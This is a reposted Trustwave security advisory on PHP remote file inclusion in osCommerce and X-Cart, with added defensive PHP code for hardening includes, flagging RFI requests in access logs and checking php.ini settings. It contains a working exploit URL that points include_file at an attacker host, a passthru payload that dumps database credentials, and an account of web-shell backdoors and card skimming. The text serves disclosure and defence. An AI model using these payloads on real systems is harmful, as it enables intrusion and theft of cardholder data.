E-commerce Security Advisory: PHP Remote File Inclusion

Posted by russianmiserable under Security, 13 Jun 2012

70 W. Madison Street, Suite 1050 Chicago, IL 60602 www.trustwave.com
1.888.878.7817 Copyright 2007

Executive Summary
In investigations of approximately 300 payment card data security breaches, Trustwave’s compromise investigations unit has observed an increase in the successful exploitation of PHP-based e-commerce Web sites via remote file-inclusion vulnerabilities. We believe that this increase is due to the prevalence of PHP-based e-commerce applications and the ease with which an attacker can exploit these applications’ vulnerabilities.

In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in which an attacker took advantage of remote file inclusion vulnerabilities in PHP-based e-commerce applications. The vendors of these applications have released updates that close the vulnerabilities, but the root problem lies in how the application user has configured the application and the PHP installation on their server.

Properly configuring PHP on a server removes the remote half of a PHP remote file-inclusion exploit. Two PHP configuration directives, register_globals and allow_url_fopen, make the exploit possible. register_globals lets request parameters populate the variables an application later passes to include(), and allow_url_fopen lets include() fetch the named file from a remote URL (from PHP 5.2.0 onward the separate allow_url_include directive, Off by default, controls this for include and require). With both enabled, a malicious user can execute their own PHP code on the vulnerable system.

Fortunately, register_globals and allow_url_fopen can be disabled easily in the php.ini configuration file. In addition, PHP 4.2.0 and later disable register_globals by default, and the directive was removed from the language altogether in PHP 5.4.0.

Trustwave recommends that online merchants perform stringent code reviews to ensure that
their e-commerce applications are properly patched and that the PHP on their servers is securely
configured.

PHP Remote File Inclusion
Trustwave has seen an increase in the successful exploitation of PHP-based e-commerce Web
sites via remote file-inclusion vulnerabilities. We believe this increase is due to the prevalent use
of PHP-based e-commerce applications and the simplicity of exploiting these vulnerabilities.

PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is particularly susceptible because, on older default installations and in the vulnerable versions discussed here, register_globals and allow_url_fopen are both enabled on the server. Together they open a route through which code hosted on a remote system is fetched and executed as if it were located on the local system.

For example, the include_once.php script included with vulnerable versions of the PHP-based osCommerce Online Merchant application provides one such route. The contents of the include_once.php script are the following:

-------- include_once.php --------
<?
// $include_file is never assigned in this script: with register_globals=On,
// PHP fills it from the request, so ?include_file=... chooses what is included.
if (!defined($include_file . '__')) {
  define($include_file . '__', 1);   // marks the file as included once
  include($include_file);            // includes whatever the request named
}
?>
----------------------------------


Because register_globals populates $include_file from the query string, an attacker can set the include_file parameter to a URL on a Web server they control. The attacker then simply requests the following URL in a browser:

http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php

The e-commerce server fetches a.php from the attacker’s Web site (MYBOX) and executes it as PHP on the e-commerce server itself. For this to work, MYBOX must return the raw PHP source rather than run it (attackers typically host the payload as a .txt file). The code included will vary depending on the attacker’s goals.
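The same pattern next to its fix, as an added example written for this advisory rather than taken from osCommerce. It reproduces what register_globals does to the include_once.php code (extract() stands in for the directive so it runs on any PHP version) and places a hardened replacement beside it, in which the request only selects a key from a fixed allow-list and never supplies a path. The request arrays, the allow-list and the base directory are constructed for the example; MYBOX is the placeholder host used above.

```php
<?php
// Added example (not osCommerce code): the include_once.php pattern as it
// behaves with register_globals=On, next to a hardened replacement.

// --- Vulnerable pattern -----------------------------------------------------
// With register_globals=On, PHP creates $include_file from the query string,
// so ?include_file=http://MYBOX/a.php reaches include() unchanged. extract()
// stands in for the directive here so the behaviour can be shown on PHP
// versions where register_globals no longer exists. The function returns the
// value include_once.php would pass to include() instead of including it.
function vulnerable_include_target(array $request)
{
    extract($request, EXTR_OVERWRITE);          // request keys become variables
    return isset($include_file) ? $include_file : null;
}

// --- Hardened pattern -------------------------------------------------------
// The request may only choose a key; the application maps that key to a file
// it ships. A remote URL, a traversal string or an unknown key is refused.
function safe_include_target(array $request, array $allowed, $base_dir)
{
    if (!isset($request['include_file']) || !is_string($request['include_file'])) {
        return null;
    }
    $key = $request['include_file'];
    if (!array_key_exists($key, $allowed)) {
        return null;                            // unknown key: refuse, do not guess
    }
    $path = $base_dir . DIRECTORY_SEPARATOR . $allowed[$key];
    // Defence in depth: even a mistake in $allowed must not yield a stream
    // wrapper (http://, ftp://, php://, data://) or a path outside $base_dir.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $allowed[$key]) || strpos($path, '..') !== false) {
        return null;
    }
    return $path;
}

// Constructed requests; MYBOX is the attacker's host, as in the advisory.
$attack    = array('include_file' => 'http://MYBOX/a.php');
$traversal = array('include_file' => '../../../../etc/passwd');
$legit     = array('include_file' => 'english');
$allowed   = array('english' => 'languages/english.php');   // constructed allow-list
$base      = '/var/www/catalog/includes';                   // constructed base directory

printf("vulnerable, attack   : %s\n", var_export(vulnerable_include_target($attack), true));
printf("hardened,   attack   : %s\n", var_export(safe_include_target($attack, $allowed, $base), true));
printf("hardened,   traversal: %s\n", var_export(safe_include_target($traversal, $allowed, $base), true));
printf("hardened,   legit    : %s\n", var_export(safe_include_target($legit, $allowed, $base), true));
```

Run it with php on the command line. The vulnerable function hands the attacker’s URL straight to what would be include(); the hardened one returns null for the URL, for the traversal string and for any key it does not know, so the include target can only ever be one of the files the developer listed. This also closes the local file inclusion that remains when only allow_url_fopen is switched off.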

For example, the following command would output the contents of the application_top.php file
present on the e-commerce Web site. The contents of the file include authentication credentials
(username, password, database location) for the backend MySQL customer database.

--- a.php ---
<? passthru("/bin/cat application_top.php")?>
-------------

In an actual case of PHP remote file inclusion, the code executed is significantly more complex than this example and often results in a Web-based backdoor being downloaded onto the compromised server. Two common Web-based backdoors are r57shell and c99shell. These shells present a Web-based interface that lets their user download and upload files, create backdoor listeners on the system, send e-mail, bounce connections to other servers and administer SQL databases.

[Figure: main interface of the r57shell]

With the r57shell copied to the compromised system, the attacker can easily modify existing Web code from their own browser. In many cases the attacker modifies the PHP code associated with the e-commerce application’s checkout process to send cardholder data to an external e-mail account, or forces cardholder data to be stored in the backend database for the attacker to retrieve at a later date.
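The intrusion path described above begins with a request of the form shown earlier (a query parameter whose value is itself a URL), and that request is recorded in the Web server’s access log. The following is an added example, not part of the Trustwave advisory, that flags such requests in Apache combined-format log lines. The log lines, addresses and the MYBOX host are constructed for the example.

```php
<?php
// Added example (not from the advisory): flags PHP remote file inclusion
// attempts in Apache combined-format access log lines, using the request
// shape shown earlier: a query parameter whose value is itself a URL.
// The log lines and hostnames below are constructed for the example.

// Parses one combined-format line into the fields the check needs; null on mismatch.
function parse_access_line($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return array('ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
                 'path' => $m[4], 'status' => (int) $m[5]);
}

// Returns the names of query parameters whose URL-decoded value is a remote
// stream URL. With allow_url_include on, php:// and data: wrappers also reach
// include(), so they are matched as well.
function rfi_parameters($request_target)
{
    $q = strpos($request_target, '?');
    if ($q === false) {
        return array();
    }
    parse_str(substr($request_target, $q + 1), $params);   // parse_str URL-decodes
    $hits = array();
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('#^\s*(?:(?:https?|ftps?|php)://|data:)#i', $value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Scans log lines and returns one record per request carrying an RFI indicator.
function find_rfi_attempts(array $lines)
{
    $alerts = array();
    foreach ($lines as $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $params = rfi_parameters($req['path']);
        if ($params) {
            $alerts[] = array('ip' => $req['ip'], 'time' => $req['time'], 'status' => $req['status'],
                              'params' => $params, 'path' => $req['path']);
        }
    }
    return $alerts;
}

// Constructed sample log: one normal request between two RFI attempts (MYBOX as above).
$sample = array(
    '203.0.113.7 - - [12/Nov/2007:03:14:07 +0000] "GET /catalog/includes/include_once.php?include_file=http://MYBOX/a.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [12/Nov/2007:03:15:01 +0000] "GET /catalog/product_info.php?products_id=42 HTTP/1.1" 200 8341 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Nov/2007:03:16:44 +0000] "GET /catalog/includes/include_once.php?include_file=http%3A%2F%2FMYBOX%2Fr57.txt%3F HTTP/1.1" 200 9102 "-" "Mozilla/4.0"',
);

foreach (find_rfi_attempts($sample) as $a) {
    printf("%s %-14s status=%d param=%s %s\n", $a['time'], $a['ip'], $a['status'],
           implode(',', $a['params']), $a['path']);
}
```

The first and third sample lines are reported (the third because parse_str() decodes the percent-encoded URL before the check), the product page request is not. A status of 200 on a flagged request, as in the sample, is the line an investigator follows up first: with allow_url_fopen off, the include fails and the server normally answers 500 or logs a PHP warning instead.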


[Figure: PHP Remote File Inclusion Diagram]

Targeted PHP-based E-commerce Applications and Remediation
In a number of our recent investigations of payment card compromises, Trustwave has found attacks targeting vulnerable versions of PHP-based e-commerce applications such as osCommerce and X-Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker used a remote file-inclusion exploit to gain access to a system and extract sensitive information. We suspect that this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease with which these vulnerabilities can be exploited.

The most common manifestation of the PHP remote file-inclusion exploit observed by Trustwave is the download of a malicious Web-based backdoor onto an e-commerce server, followed by alteration of the PHP code associated with the checkout process to harvest cardholder data.

Remote file inclusion vulnerabilities in both the osCommerce and X-Cart applications have been
publicly disclosed:

Remote file inclusion vulnerabilities

Application                       Vulnerable file(s)                      Disclosure date   Reference
osCommerce Online Merchant v2.1   include_once.php                        06/16/2002        Bugtraq ID 5037
Qualiteam X-Cart 4.x              cmpi.php                                09/08/2006        Bugtraq ID 20108
Qualiteam X-Cart 3.5.0            config.php, prepare.php, smarty.php,    09/11/2007        Bugtraq ID 25637
                                  product.php, auth.php

Although the vendors listed above have released updates to patch the vulnerabilities, the root
problem lies on the application user’s side with the configuration of the PHP programming
language on their server.

E-commerce merchants can largely avoid PHP remote file inclusion exploits by properly configuring the PHP installed on their server. The majority of PHP remote file-inclusion exploits are possible because of two configuration directives included within PHP, register_globals and allow_url_fopen. register_globals lets an attacker supply the variable that names the file to include; allow_url_fopen lets include() fetch that file from a remote site for local execution. From PHP 5.2.0 onward a third directive, allow_url_include (Off by default), governs remote include and require separately from allow_url_fopen and should be left Off.

An administrator can easily disable these directives in the php.ini configuration file (register_globals = Off, allow_url_fopen = Off, allow_url_include = Off). In PHP 4.2.0 and later, register_globals is disabled by default; in PHP 5.4.0 the directive was removed altogether. Note that these settings block only the remote half of the attack: an application that still passes a user-controlled value to include() remains open to local file inclusion, so the vendor’s patch is needed as well.
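A check of the live configuration, as an added example that is not Trustwave’s code: it reads the directives named above, plus allow_url_include, through ini_get(), so it reports what the running interpreter actually uses (including any per-directory override) rather than what a php.ini on disk says. The same function also accepts a captured configuration; the two arrays at the end are constructed to show a weak php.ini beside the corrected one.

```php
<?php
// Added example (not Trustwave's code): reports the PHP directives this
// advisory names, plus allow_url_include, as the running interpreter sees
// them. $settings lets the same check run against a captured configuration.

// ini_get() returns the raw php.ini string: "1", "On", "true" and "yes" mean
// enabled; "", "0", "Off", "false", "no" and a missing directive (false) do not.
function ini_flag_enabled($value)
{
    if ($value === false || $value === null) {
        return false;
    }
    $v = strtolower(trim((string) $value));
    return !in_array($v, array('', '0', 'off', 'false', 'no'), true);
}

// Returns one finding per enabled directive; an empty array means the
// RFI-relevant settings are safe. With $settings === null the live values are read.
function rfi_config_findings($settings = null)
{
    $directives = array(
        'register_globals'  => 'set Off (removed in PHP 5.4.0)',
        'allow_url_fopen'   => 'set Off unless a documented feature needs remote streams',
        'allow_url_include' => 'set Off (PHP >= 5.2.0); remote include/require is never needed here',
    );
    $findings = array();
    foreach ($directives as $name => $advice) {
        if ($settings === null) {
            $value = ini_get($name);
        } else {
            $value = isset($settings[$name]) ? $settings[$name] : false;
        }
        if (ini_flag_enabled($value)) {
            $findings[] = "$name is enabled (value \"$value\"): $advice";
        }
    }
    return $findings;
}

// Constructed configurations: a weak 2007-era php.ini and the corrected one.
// The corrected lines belong in php.ini verbatim:
//   register_globals = Off
//   allow_url_fopen = Off
//   allow_url_include = Off
$weak  = array('register_globals' => 'On',  'allow_url_fopen' => '1',   'allow_url_include' => 'Off');
$fixed = array('register_globals' => 'Off', 'allow_url_fopen' => 'Off', 'allow_url_include' => 'Off');

foreach (array('weak' => $weak, 'corrected' => $fixed, 'live' => null) as $label => $cfg) {
    $findings = rfi_config_findings($cfg);
    echo $label, ': ', ($findings ? implode('; ', $findings) : 'no RFI-relevant directive enabled'), "\n";
}
```

Run it from the command line with php, or briefly through the Web server to see the values mod_php is really using; remove it afterwards, since a configuration report is as useful to an attacker as to an administrator. The weak configuration yields two findings (register_globals and allow_url_fopen), the corrected one none.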

In conclusion, to protect against PHP remote file-inclusion exploits, Trustwave recommends that e-commerce merchants perform stringent code reviews to ensure that their e-commerce applications are properly patched and securely configured. At the very least, this process should include disabling the register_globals, allow_url_fopen and allow_url_include PHP directives in the php.ini configuration file.


About Trustwave
Trustwave is the leading provider of on-demand and subscription-based information security and
payment card industry compliance management solutions to businesses and government entities
throughout the world. For organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive solutions that include its
flagship TrustKeeper® compliance management software and other proprietary security solutions.
Trustwave has helped more than 30,000 organizations—ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers—manage compliance and secure their network
infrastructure, data communications and critical information assets. Trustwave is headquartered in
Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For
more information, visit https://www.trustwave.com/